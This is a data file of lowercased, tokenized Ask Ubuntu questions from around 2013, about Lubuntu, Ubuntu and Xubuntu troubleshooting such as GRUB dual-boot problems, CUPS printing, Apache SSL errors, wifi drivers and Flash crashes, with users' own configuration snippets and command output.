369319	how to disable tap to click in lubuntu 13.10	tap to click is usually the first thing i disable when i have installed a new os , but this time i could n't get rid of it . in earlier versions of lubuntu , i was able to disable it by writing @ synclient maxtaptime=0 to /etc/xdg/lxsession/lubuntu/autostart and save . but in lubuntu 13.10 this method does n't work any more . i ca n't find any solution on the internet either . ( if there was a checkbox in `` mouse and keyboard '' preferences in lxde to turn tap to click on/off permanently , like in unity , that would make both lovers and haters of this divisive feature happy . i do n't understand how this feature could be thought of as something everybody wants . )
369320	crack when removing earphones	i just installed ubuntu 13.10 on my asus n76vz laptop . when i remove earphones , i hear a crack in the laptop speakers which is quite loud . if i mute the sound , the crack is audible , but at a lower level . is there a simple way to diagnose and solve this problem ? the sound seems to be fully functional aside from that .
369324	grub2 can not detect windows 8	at installation it did not detect windows . i mounted the windows partition and have run os-prober with no results returning . i am able to boot windows or ubuntu by specifying the partition in uefi boot order . the bios does not appear to allow booting with legacy . secureboot is on . this is with ubuntu 12.04 lts on a inspiron 15 . here is the gdisk : 1 2048 1026047 500.0 mib ef00 efi system partition 2 1026048 1107967 40.0 mib ffff basic data partition 3 1107968 1370111 128.0 mib 0c01 microsoft reserved part 4 1370112 2394111 500.0 mib 2700 basic data partition 5 2394112 544743423 258.6 gib 0700 basic data partition 6 606183424 625140399 9.0 gib 2700 microsoft recovery part 7 544743424 545230847 238.0 mib 0700 ( /boot ) 8 545230848 556949503 5.6 gib 8200 ( swap ) 9 556949504 606181375 23.5 gib 0700 ( / ) when installing ubuntu , i believe i specified that the bootloader be installed on /dev/sda . i added the following to /etc/grub.d/40_custom but booting ubuntu did not offer a grub menu : menuentry `` windows 8 '' { set root = `` ( hd0,4 ) '' chainloader +1 } when booting i think i see `` efi disk error '' flash very quickly before ubuntu starts booting .
369326	lubuntu 13.10 unable to connect to printer through us robotics router 5461	i am using lubuntu 13.10 ( recently upgraded ) and am trying to print to a network printer ( hp photosmart 7960 ) through my router ( us robotics 5461 ) . my printer is connected to the router via usb cable . normally , i would use the cups configuration interface to set up the wireless connection to the printer . i was able to use the printer through the router wirelessly , using ubuntu 12.04 . now , with my recently upgraded lubuntu 13.10 , i am unable to get the cups config webpage ( http : //localhost:631 ) to come up . in chromium , i get : this web page is not available . in firefox , i get : unable to connect . firefox ca n't establish a connection to the server at localhost:631 . the cups config file details are below . i have this website to help with the router connections for linux : http : //www.usr.com/support/5461/5461-files/printer_installation_linux/index.html my printer 's address through the router is : http : //192.168.2.1:1631/printers/my_printer can you tell me how to fix this ? or , what to add to the cups configuration file to make this work ? please help . thanks psychicnut cups config file details : # show general information in error_log . loglevel warn maxlogsize 0 systemgroup lpadmin listen /var/run/cups/cups.sock listen /var/run/cups/cups.sock listen 192.168.2.1:1631 browsing off browselocalprotocols dnssd defaultauthtype basic webinterface yes < location / > order allow , deny < /location > < location /admin > order allow , deny < /location > < location /admin/conf > authtype default require user @ system order allow , deny < /location > < policy default > jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default < limit create-job print-job print-uri validate-job > order deny , allow < /limit > < limit send-document send-uri hold-job release-job restart-job purge-jobs set-job-attributes create-job-subscription renew-subscription cancel-subscription get-notifications reprocess-job cancel-current-job suspend-current-job resume-job cancel-my-jobs close-job cups-move-job cups-get-document > require user @ owner @ system order deny , allow < /limit > < limit cups-add-modify-printer cups-delete-printer cups-add-modify-class cups-delete-class cups-set-default cups-get-devices > authtype default require user @ system order deny , allow < /limit > < limit pause-printer resume-printer enable-printer disable-printer pause-printer-after-current-job hold-new-jobs release-held-new-jobs deactivate-printer activate-printer restart-printer shutdown-printer startup-printer promote-job schedule-job-after cancel-jobs cups-accept-jobs cups-reject-jobs > authtype default require user @ system order deny , allow < /limit > < limit cancel-job cups-authenticate-job > require user @ owner @ system order deny , allow < /limit > < limit all > order deny , allow < /limit > < /policy > < policy authenticated > jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default < limit create-job print-job print-uri validate-job > authtype default order deny , allow < /limit > < limit send-document send-uri hold-job release-job restart-job purge-jobs set-job-attributes create-job-subscription renew-subscription cancel-subscription get-notifications reprocess-job cancel-current-job suspend-current-job resume-job cancel-my-jobs close-job cups-move-job cups-get-document > authtype default require user @ owner @ system order deny , allow < /limit > < limit cups-add-modify-printer cups-delete-printer cups-add-modify-class cups-delete-class cups-set-default > authtype default require user @ system order deny , allow < /limit > < limit pause-printer resume-printer enable-printer disable-printer pause-printer-after-current-job hold-new-jobs release-held-new-jobs deactivate-printer activate-printer restart-printer shutdown-printer startup-printer promote-job schedule-job-after cancel-jobs cups-accept-jobs cups-reject-jobs > authtype default require user @ system order deny , allow < /limit > < limit cancel-job cups-authenticate-job > authtype default require user @ owner @ system order deny , allow < /limit > < limit all > order deny , allow < /limit > < /policy > jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default
369331	install ubuntu goes blank hp envy m7 touchsmart	when installing from the cd it gives the option to try ubuntu or install . but when i select install the screen goes blank .
369332	running with virtual box	i recently purchased a new laptop and i am currently dual booting windows 7 and the latest ubuntu package , my question is there a way that i can run that my ubuntu in virtual box ? until now i 've only been using iso images and i looking for a solution or some one point to point me the right direction . thanks in advance .
369333	is there a distro that delivers compiz as default windows manager ?	i want to know if there 's a distro that comes with compiz as default windows manager . i know ubuntu comes with unity and i can setup compiz after install , but it would be helpful if there 's a distro that uses compiz as default .
369337	problem : black screen after resume	problem : black screen after resume i found the below statement that i provided the link for but , no instructions with it for a person that 's new to ubuntu on what exactly to do to fix the problem . can someone clarify this for me ? thank you . ubunu 13.10 amd a6-3420m apu with radeon ( tm ) hd graphics ă 4 64bit toshiba l775 my computer boots to a black screen , what options do i have to fix it ? typical scenario is `` use a laptop docked with lid closed , only the external screen is active , suspend , take the laptop , open it somewhere '' ... which leads to `` no screen active '' . to debug this problem , check if gnome-settings-daemons is getting a signal that the display configuration has changed , by running xtrace against it , and look for a rrscreenchangenotify event when resuming the machine . if that signal is being sent , then it indicates a possible bug in g-s-d . otherwise , it suggests a bug in either x or ( more likely ) the kernel which is not causing the signal to be emitted to begin with .
369341	after installing ubuntu 13.04 and running boot-repair , ubuntu fails to load , gets stuck with a blank screen	i installed ubuntu 13.04 on a lenovo thinkpad with windows 8 preinstalled with great difficulty . to make it run , i edited the boot command by adding the following line : acpi_osi=linux acpi_backlight=vendor . i was able to boot once into ubuntu after running boot-repair . but then subsequent times onwards , i get stuck with a blank screen in spite of giving the above options . i ran boot repair a couple of times more using a live disk and a live usb . it still gets stuck . http : //paste.ubuntu.com/6339188/ i 've noticed a few things . i 've got a lot of partitions on my disk now . there is a partition for windows 8 , a partition for lenovo backup files , 2 partitions ( around 200gb each ) for miscellaneous purposes and one more partition for ubuntu . everything else , i 'm not sure how they 've appeared . can anyone guide me ?
369344	can not install kubuntu 13.10	i have installed kubuntu 13.10 using wubi in windows 8 . it asked for a reboot , after restarting i have selected the kubuntu boot option . then the countdown starts ( 5 seconds ) for selecting from the menu . then afterwards only a black screen appears ( except for the demo mode ) , and i 'm unable to do anything . please help me to solve this problem .
369346	how to stop the software updater . from nagging about the firefox updates ?	that was a smart move by mozilla making release 24 an extended service release . avoiding the unnecessary mochromezilla experience , i 'm sticking with ( traditional ) firefox 24 esr for as long as i can . in windows , i had the option of stopping the nagging for a particular update . i do n't mind modifying scripts or hacking the os . please tell me that someone out there knows how to stop the software updater from daily asking me to update to the same firefox release that i do not want , yet still allow me to get the desired system updates . without that ability to permanently decline the latest firefox update , it 'll be enough to make me turn off the automatic ubuntu software update notifications for good . thanks for reading . edit : it turns out that firefox 25 is ok after all . mozilla pushed back implementing australis until next year ! http : //www.ghacks.net/2013/10/24/firefoxs-australis-design-wont-ship-march-2014/
369351	restore ubuntu to newly installed operating system	i want to restore my ubuntu 12.04 os just as a fresh installed ubuntu 12.04 operating system by restoring everything like factory defaults . is it possible ? how to do it from terminal as i am connected via ssh to the ubuntu system .
369352	what version of mono is included by default ?	what version of mono ships by default ?
369354	ubuntu 12.04 media player does not show video ?	this question seems poor but i really facing this problem ( i am new to ubuntu ) . i install ubuntu 12.04 on my hp laptop . i also upgraded all its packages using sudo apt-get update & & sudo apt-get upgrade . but when i play any video file through media player ( default and smplayer ) , i can only hear audio but no video is seen , screen becomes blanks . all types of video file can be played but only audio can be heard , no video .
369357	broadlink bcm4313 driver problem	my ubuntu version is 13.10 i have issues with my wi-fi . when i boot up my os , the signal of my wifi show very less or no strength . i have to disable ( software updater > additional drivers > do not use this device and apply ) and then enable it . then only it shows full strength . have to repeat it every time i boot up . ps : moreover why does ifconfig command shows my wifi as eth1 and not wlan0 after doing above steps ? please help . how to solve this problem ?
369360	grub lost after installing windows 7	after installing windows7 and i am not able to choose ubuntu and even i have only wireless internet connection and previously my wifi is not working as well on ubuntu 12.10 so i cant even boot repair by using these commands sudo add-apt-repository ppa.yannuubuntu/boot-repair sudo apt-get-update sudo apt-get install boot-repair sudo boot repair icant follow these commands as my wifi is nt working
369362	bitorrent wo n't connect	i 'm new to ubuntu ( have 12.04 and i dont know how sudo iptables -a input -p tcp -d 0/0 -s 0/0 -- dport 8289 -j acceptto upgrade ) just got it installed a few hours ago before then i had no experience with it at all ... anyways i 'm trying to get bitorrent to work ive been googling how to do everything and have had some luck but not with this the thing on the bottom right thats supposed to be green with a check mark is the yellow/orange triangle with an exclamation point saying ... '' no incoming connections unless the icon turns green , it could indicate a problem with your network configuration . '' i do n't know how to connect it to the internet ( or make it work idk if its even not connected im just confused and not the best computer user but im trying to learn : / )
369363	ubuntu 13.10 upgrade installation failed	i was busy upgrding my ubuntu , even left it over night . i used my machine like normal while the download was continuing when i woke up in the morning , my machine was unresponsive and seems like the only button that worked was the power button . i rebooted it and it does n't wan na boot ( well it does but i 'm left with a terminal ui of which i ca n't even enter commands ) . how can i resolve this without losing my data ?
369364	problems during installing brother dcp-j140w printer	i am new ubuntu user my laptop is `` vaio vpceb1m0e `` i could n't install the printer `` brother dcp-j140w '' , and i tried all the steps in this related questions and topics 1,2 , and 3 . when i did the steps in the last link i was able to install the driver but i ca n't see the printer icon in the printers window ! and in the terminal i saw this lines : molham @ molham-vpceb1m0e : ~/downloads $ sudo dpkg -i -- force-all dcpj140wlpr-1.1.3-6.i386.deb ( reading database ... 180721 files and directories currently installed . ) preparing to replace dcpj140wlpr : i386 1.1.3-6 ( using dcpj140wlpr-1.1.3-6.i386.deb ) ... unpacking replacement dcpj140wlpr : i386 ... setting up dcpj140wlpr : i386 ( 1.1.3-6 ) ... mkdir : can not create directory `/var/spool/lpd/dcpj140w ' : no such file or directory chown : can not access `/var/spool/lpd/dcpj140w ' : no such file or directory chgrp : can not access `/var/spool/lpd/dcpj140w ' : no such file or directory chmod : can not access `/var/spool/lpd/dcpj140w ' : no such file or directory molham @ molham-vpceb1m0e : ~/downloads $ dpkg -l | grep brother4 to be honest i ignored this and continued the progress and this is the rest of the results : molham @ molham-vpceb1m0e : ~/downloads $ sudo dpkg -l | grep brother ii dcpj140wlpr : i386 1.1.3-6 brother lpr inkjet printer definitions ii printer-driver-ptouch 1.3-3ubuntu0.1 printer driver brother p-touch label printers molham @ molham-vpceb1m0e : ~ $ cat /etc/printcap dcpj140w : \ : mx=0 : \ : sd=/var/spool/lpd/dcpj140w : \ : sh : \ : lp=/dev/usb/lp0 : \ : if=/opt/brother/printers/dcpj140w/lpd/filterdcpj140w : please ! any one can help me to know what should i do ?
369369	install ambiance theme in ubuntu gnome	i installed ubuntu gnome 13.10 and want to install the ambiance theme found in the normal saucy distribution . how to do it ?
369370	how to create bootable usb stick for mac on ubuntu ?	i would like to make a bootable usb on ubutu to boot on mac . please help . thanks in advance
369371	weird apache ssl_error_rx_record_too_long error	i bought a wildcard ssl cert from alphassl but after installing it firefox gives me ssl_error_rx_record_too_long error when visiting the site . i 'm tearing my hair out i just trying to get this working . neither documentation , google , nor the logs have been of much help : /var/log/apache2/error.log ^ [ fri nov 01 04:39:04 2013 ] [ error ] [ client 173.250.131.121 ] invalid method in request \x16\x03\x01 [ fri nov 01 04:39:04 2013 ] [ error ] [ client 173.250.131.121 ] invalid method in request \x16\x03\x01 /var/log/apache2/ssl_access.log 173.250.131.121 - - [ 01/nov/2013:04:45:55 +0000 ] `` \x16\x03 '' 501 311 `` - '' `` - '' 173.250.131.121 - - [ 01/nov/2013:04:46:03 +0000 ] `` \x16\x03\x01 '' 501 312 `` - '' `` - '' i restarted apache , i disabled other sites to ensure that v-host i am configuring is the one that is getting loaded , checked that mod_ssl is loaded , and ran the certs through openssl . i 've put a more complete terminal history in this gist . here is a compact version of my virtual host ssl settings . note that i 've tried 46.149.28.113:443 , _default_:443 , * , secure.speech.is:443 and others . < ifmodule mod_ssl.c > < virtualhost 46.149.28.113:443 > ... sslengine on sslcertificatefile /etc/ssl/certs/speech.is.crt sslcertificatekeyfile /etc/ssl/private/server.key sslcertificatechainfile /etc/ssl/certs/alphasslroot.crt < /virtualhost > < /ifmodule > ideas ?
369373	removed saved unity webapps	so i removed chromium , but the web apps installed google plus , gmail , facebook , ect remain . these were installed with unity-chromium-extension popup when i launched a compatible site . i am switching to firefox .
369379	wrong version python-django-maas	i 'm trying to install maas with ubuntu 12.04.3 lts ( server ) . i added extra repos , as suggested in https : //juju.ubuntu.com/install/ and http : //www.ubuntu.com/download/cloud/cloud-archive-instructions . add-apt-repository ppa : juju/stable and in /etc/apt/sources.list deb http : //ubuntu-cloud.archive.canonical.com/ubuntu precise-updates/havana main then when navigate to http : // < my-host > /maas i get 500 internal server error tail /var/log/apache2/error.log [ fri nov 01 17:02:57 2013 ] [ error ] [ client 10.0.0.106 ] file `` /usr/share/maas/maas/urls.py '' , line 25 , in < module > [ fri nov 01 17:02:57 2013 ] [ error ] [ client 10.0.0.106 ] url ( r'^ ' , include ( 'maasserver.urls ' ) ) , [ fri nov 01 17:02:57 2013 ] [ error ] [ client 10.0.0.106 ] file `` /usr/lib/python2.7/dist-packages/django/conf/urls/__init__.py '' , line 25 , in include [ fri nov 01 17:02:57 2013 ] [ error ] [ client 10.0.0.106 ] urlconf_module = import_module ( urlconf_module ) [ fri nov 01 17:02:57 2013 ] [ error ] [ client 10.0.0.106 ] file `` /usr/lib/python2.7/dist-packages/django/utils/importlib.py '' , line 35 , in import_module [ fri nov 01 17:02:57 2013 ] [ error ] [ client 10.0.0.106 ] __import__ ( name ) [ fri nov 01 17:02:57 2013 ] [ error ] [ client 10.0.0.106 ] file `` /usr/lib/python2.7/dist-packages/maasserver/urls.py '' , line 22 , in < module > [ fri nov 01 17:02:57 2013 ] [ error ] [ client 10.0.0.106 ] from django.views.generic.simple import direct_to_template [ fri nov 01 17:02:57 2013 ] [ error ] [ client 10.0.0.106 ] importerror : no module named simple . dpkg -s /usr/lib/python2.7/dist-packages/maasserver/urls.py python-django-maas i know some python but i do n't know much about django . google suggests i need a version of python-django-maas that is updated to django 1.5 . in that case can i have some help with backport or apt pin ? otherwise what am i doing wrong ? thanks , drew
369380	i cant use ctrl+s to save in eclipse when language is not english	i cant use ctrl+s or any other shortcuts in eclipse when language is not english , is it a bug with ubuntu or eclipse ? how can i fix it ? it is very annoying when i am coding in eclipse.i have recently updated to ubuntu 13.10. thank you
369382	checking update reason after actual update	is there a possibility to find out the reason for at least the last automatic update ? when the update-window pops up one can click on the entries and find a statement about what bug shall be fixed with a certain package , or more general why it is updated at all . i want to check for this information afterwards to check if a certain bug or functionality is claimed to be fixed already . thx - robert .
369384	how to use qtransmission bittorrent ?	i have installed this program but have no idea how to use it . please give me a guideline . instead of a simbol it shows a ? .
369388	dell inspiron 1525 laptop does not recognise bluetooth	i have dell inspiron 1525 laptop with broadcomm wireless . after installing ubuntu 13.10 , it did not detect wifi or bluetooth . after checking in the forums i was able to rectify the wifi issue . now the wifi light glows , and able to connect to my wifi router . steps taken : 1 . installed synaptic . 2 . uninstalled bcmwl-kernel-source package ( i had reinstalled this earlier , but my wireless was not working , so tried this and next step ) 3 . installed firmware-b43-installer and b43cutter . 4 . rebooted and the wifi was working . but bluetooth light is not on , nor does it identifies in rfkill rfkill command result : 0 : phy0 : wireless lan soft blocked : no hard blocked : no when checking bluetooth icon in system settings , it says `` drivers not installed '' my system settings using lspci 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 02 ) 00:1c.4 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 5 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f2 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 02 ) 02:09.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 02:09.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 02:09.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) 02:09.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 12 ) 09:00.0 ethernet controller : marvell technology group ltd. 88e8040 pci-e fast ethernet controller ( rev 12 ) 0b:00.0 network controller : broadcom corporation bcm4311 802.11a/b/g ( rev 01 ) rg , pram
369389	how do i check that a configuration file has been read ?	it seems that modifications to my /etc/ssh/sshd_config file are not picked up by the ssh daemon . for test purposes , i included a denyusers * , did service ssh restart , and even rebooted the whole system . but i still can ssh from remote . how can i check that the /etc/ssh/sshd_config file gets read by sshd ?
369390	ati firepro v5900 noisy with standard drivers	i 've just reinstalled 13.04 and i am using the default drivers ( radeon module it seems ) for my firepro v5900 . the driver works great , apart from that my fan , probably gpu-fan , is spinning at high speeds making a lot of noise . when i use the driver that 's available from the ati/amd website ( version 12.104.2 ) the fan calms down and everything works great but these drivers no longer work with kernel 3.10.x . the problem is that the code from ati/amd uses deprecated methods that have been removed in kernel 3.10.x , therefore i can no longer use this driver . i 've tried other drivers from the ati/amd web site but they 're either not applicable or they use the deprecated functions too . here 's an example : === /home/oddb/fglrx/build_mod/2.6.x/drm_proc.h:98:2 : error : implicit declaration of function âcreate_proc_entryâ [ -werror=implicit-function-declaration ] if ( ! minor ) root = create_proc_entry ( `` dri '' , s_ifdir , null ) ; === anyone know what one can do to fix this ?
369392	libreoffice default styles not listed in style box ( f11 )	i have recently started using ubuntu ( raring ringtail ) for the first time . in libreoffice , the default styles are invisible when you press f11 ( styles and formatting ) ; user defined styles are visible as normal . is this the way it should work , and if one needs to use the default styles , how can you make them visible ?
369396	how to control gtkscales with python ?	i want to add gtkscales in a quickly application and control it with python to adjust brightness via xrandr . we have already made the code via raw python here and would like to do this via quickly to have things like ppa easily .
369398	graphics problem after updating to kernel 3.11 with ubuntu 13.04 64bit	i am new to ubuntu.i have a 64 bit intel processor with ati 6570 graphics card . now ubuntu 13.04 is working fine with stock kernel ( 3.8 ) . but as i read somewhere that kernel 3.11 do support ati graphics card better , i tired updating them with no success . i tried 3.11.6 3.11.4 3.11.0 but with all of them i am facing the same problem ... after installing them and restart , the screen resolution get distorted and the unity becomes too slow transparency in dash and the launcher is also lost . now whatever little i know , this may be related with graphics diver either they are not present or the graphic card is not turned on . can some one help with this . and yeah i tried ubuntu 13.10 that worked fine but it has some bugs . and yeah please pardon me for my bad english .
369402	how to use cohiba 3887 rev0 in ubuntu 13.10	i have a ( inventel wifi usb ) dongle . i want to install and use this device in ubuntu , i insert in my uubuntu 13.10 32bit version . but it ca n't find this device . how to use my inventel cohiba 3887 rev0 device in my pc ?
369405	shockwave flash crashes with chromium and firefox	since updating to ubuntu 13.10 , shockwave flash does not work in chromium or firefox . both show a `` shockwave flash has crashed '' dialog . chromium 29.0.1547.65 after loading a page with a flash video , i get this warning on the console twice : nvidia : could not open the device file /dev/nvidia0 ( operation not permitted ) . when i try to play the video , it crashes and i receive these disorted error messages : ( exe:14868 ) : gdk-warning ** : xid collision , trouble ahead [ xcb ] extra reply data still left in queue [ xcb ] this is most likely caused by a broken x extension library [ xcb ] aborting , sorry about that . owser -- type=plugin -- plugin-path=/usr/lib/flashplugin-installer/libflashplayer.so -- lang=de -- channel=14560.18.20766867 : ../../src/xcb_io.c:576 : _xreply : assertion ` ! xcb_xlib_extra_reply_data_left ' failed . firefox 25.0 with firefox , i get these errors : # # # ! ! ! abort : request 154.24 : badvalue ( integer parameter out of range for operation ) ; 3 requests ago : file /build/buildd/firefox-25.0+build3/toolkit/xre/nsx11errorhandler.cpp , line 157 warning : pipe error ( 110 ) : connection reset by peer : file /build/buildd/firefox-25.0+build3/ipc/chromium/src/chrome/common/ipc_channel_posix.cc , line 437 # # # ! ! ! [ parent ] [ rpcchannel ] error : channel error : can not send/recv what i tried so far reinstalling flashplugin-installer changing permissions of /dev/nvidia0 tried google chrome 30.0.1599.114 , which works perfectly with its own flash plugin . it seems that flash aid is no longer available . gpu acceleration is working fine , e.g . for portal . does anyone know how to fix this ?
369406	xubuntu - apps loading at start up	every time i log into xubuntu , apps like libre office and the web browser keep opening . how can i stop this ? the apps that show up are : firefox geary hotot bunch of error messages keyring password permission
369411	any videoconferencing software for ubuntu ?	first of all , thanks for reading and helping ! i have a quick question . i need to know if there is a software option which i could use to connect to a videoconference bridge ( such as a polycom rmx or tandberg vcs , etc ) via ip . web options are also welcome .
369412	possible to call gimp via to the commant line to flatten and export a pdf image ?	i 've got a pdf figure with millions of semi-transparent points that i made in r. i want to flatten it to reduce filesize and then export it back out as a pdf ( as a vector still , not a bitmap ) . if there is a command line option , i can run it from within r using a system ( ) call . is there a way to do this ?
369420	some of the system keyboard strokes do not work on teamviewer 8 ?	when i connect to a remote machine , enter , shift and some other strokes do not work . right click of the mouse does n't work either . however letter keys are perfectly fine . do you have any reasoning ?
369423	google docs remove lens that installed from firefox	when i used gdocs on firefox its asked to install gdocs to system . how i can delete it now ?
369425	quicksynergy does n't work between ubuntu 13.10 and xubuntu 12.04	the server is xubuntu 12.04 while the client is ubuntu 13.10 . my quicksynergy does n't work . but it works well with another windows client . by the way , before i switch my server from ubuntu 13.10 to xubuntu 12.04 , it worked well . does any one know the problem ? thanks a lot !
369426	ubuntu partitions on dell xps13	i bought a dell xps13 with ubuntu 12.04 pre-installed . i want to reformat and repartition the machine but as i 'm far from being a linux guru , i 'm afraid to erase something important that could have been preinstalled by dell . on the disk , there are 3 partitions : /dev/sda1 - ext4 linux bootable 248gb - witch is the system+user partition i guess , /dev/sda2 - extended ( ? ) of 8gb - what is this partion about ? /dev/sda5 - linux swap of 8gb - whitch is for ram and need to be reconduct ( why only 1xram and not 2 ? ) do i have to care about /dev/sda2 ? according to you can i reformat to create a partition for /home whitout losing anything important ( except user data of course ) ? thank you for your help
369427	ca n't control connection bit rate using iwconfig with atheros tl-wn821n ( ar7010 )	i 'm trying to reduce the connection bit rate on my atheros tp-link tl-wn821n v3 usb wifi adapter due to frequent instability issues ( reported connection speed goes down to 1mb/s and i have to physically reconnect the adapter to regain a connection ) . i know this is a common problem with this device , and i have tried everything i can think of to fix it , including using drivers from linux-backports ; compiling and installing a custom firmware ( following instructions on https : //wiki.debian.org/ath9k_htc # fw-free ) and ( as a last resort ) using ndiswrapper . when using ndiswrapper , the wifi adapter is stable and operates in g mode at 54mb/s ( whilst when using the default ath9k_htc module , the adapter connects in n mode and the bit rate fluctuates constantly ) . unfortunately , with this setup i have to run my processor using only one core , since using smp with ndiswrapper causes a kernel oops on my system . so i want to lock my bit rate to 54mb/s ( or less , if need be ) for connection stability , using the ath9k_htc module . i 've tried 'sudo iwconfig wlan0 rate 54m ' ; the command runs with no error but when i check the bit rate with 'sudo iwlist wlan0 bitrate ' the command returns : wlan0 unknown bit-rate information . current bit rate:78 mb/s any ideas ? here 's some info ( hopefully relevant ) on my setup : xubuntu ( 12.04.3 ) 64bit ( kernel 3.2.0-55.85-generic ) using network manager . my router is from virgin media , the vmdg480 . lshw -c network : *-network description : wireless interface physical id : 1 bus info : usb @ 1:4 logical name : wlan0 serial : 74 : ea:3a:8f:16 : b6 capabilities : ethernet physical wireless configuration : broadcast=yes driver=ath9k_htc driverversion=3.2.0-55 firmware=1.3 ip=192.168.0.9 link=yes multicast=yes wireless=ieee 802.11bgn lsusb -v : bus 001 device 003 : id 0cf3:7015 atheros communications , inc. tp-link tl-wn821n v3 802.11n [ atheros ar7010+ar9287 ] device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 255 vendor specific class bdevicesubclass 255 vendor specific subclass bdeviceprotocol 255 vendor specific protocol bmaxpacketsize0 64 idvendor 0x0cf3 atheros communications , inc. idproduct 0x7015 tp-link tl-wn821n v3 802.11n [ atheros ar7010+ar9287 ] bcddevice 2.02 imanufacturer 16 atheros iproduct 32 ub95 iserial 48 12345 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 60 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0x80 ( bus powered ) maxpower 500ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 6 binterfaceclass 255 vendor specific class binterfacesubclass 0 binterfaceprotocol 0 iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x04 ep 4 out bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0040 1x 64 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x05 ep 5 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x06 ep 6 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.00 bdeviceclass 255 vendor specific class bdevicesubclass 255 vendor specific subclass bdeviceprotocol 255 vendor specific protocol bmaxpacketsize0 64 bnumconfigurations 1 device status : 0x0000 ( bus powered ) iwlist wlan0 scanning : wlan0 scan completed : cell 01 - address : c4:3d : c7:3a:1f:5d channel:1 frequency:2.412 ghz ( channel 1 ) quality=37/70 signal level=-73 dbm encryption key : on essid : '' my essid '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=00000070cca77186 extra : last beacon : 5588ms ago ie : unknown : 0007756e69636f726e ie : unknown : 010882848b962430486c ie : unknown : 030101 ie : unknown : 2a0100 ie : unknown : 2f0100 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1afc181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1601080400000000000000000000000000000000000000 ie : unknown : dd7e0050f204104a0001101044000102103b00010310470010f99c335d7bac57fb00137dfa79600220102100074e657467656172102300074e6574676561721024000631323334353610420007303030303030311054000800060050f20400011011000743473331303144100800022008103c0001011049000600372a000120 ie : unknown : dd090010180203f02c0000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 2 ) : ccmp tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 iwconfig : lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' my essid '' mode : managed frequency:2.412 ghz access point : c4:3d : c7:3a:1f:5d bit rate=78 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=36/70 signal level=-74 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 ,
